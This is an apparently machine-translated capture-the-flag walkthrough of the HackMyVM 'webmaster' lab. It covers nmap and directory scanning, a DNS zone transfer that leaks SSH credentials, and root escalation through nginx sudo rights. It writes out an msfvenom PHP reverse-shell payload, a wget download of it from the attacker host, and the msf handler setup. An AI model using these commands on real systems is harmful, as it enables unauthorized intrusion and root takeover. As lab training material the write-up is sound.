Hackmyvm target series (1) -webmaster

One 、 information gathering

First use nmap Scan segments , Detect live hosts , Since there are many campus network hosts, I won't look for them one by one , Use grep Find the target host directly .

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

Port scan the target host , Detect target open services

nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8

Scan to three services ,ssh,dns,http

Visit , The discovery is a picture , It roughly means where you keep your password ？Bitwarden and Keepass Baidu is a password management tool . Remember the one below TXT, It's an important reminder .

Use dirsearch Scan the directory .

dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30

However, no useful information was found .

The picture above suggests txt, So try to use wfuzz Blow it up txt file

wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txt

And use dirsearch equally , I haven't found any useful news

Then check the page source code , Find a webmaster.hmv, It looks like a domain name . So put it in host File parsing , But it's no use .

Two 、 Exploit

Think of just using nmap Scan to open dns service , Try to use dig Analyze it dns Record

dig axfr @192.168.200.8 webmaster.hmv
#@IP Address    Appoint DNS The server 

It's very suspicious to find this thing , It looks like an account and password

john:Myhiddenpazzword

Try signing in ssh, Login successful

Get the first one flag

3、 ... and 、 Elevated privileges

Next is the right raising operation

sudo -l

Find out nginx Can be started by any user , And you don't need to enter a password .

By looking at the process , Find out nginx In order to root Permission started .

Then check the root directory of the web page , Anyone who finds the root directory has the permission to delete and write files , Plus nginx In order to root Permission started , We can write shell, Visit this again shell Get permission .​​​​​​​

First check the host information , yes 86 Bit

Use msf Create a Trojan

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php

Then use on the target machine wget Download the Trojan horse

wget http://192.168.200.130:7890/shell.php

Grant execution permission

chmod +x shell.php

stay msf Start listening on

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555

kali Access Trojan files , because nginx yes root Permission to run , Visited shell.php When you file, you get root jurisdiction

msf Receive session , Permission is root

Get the last one flag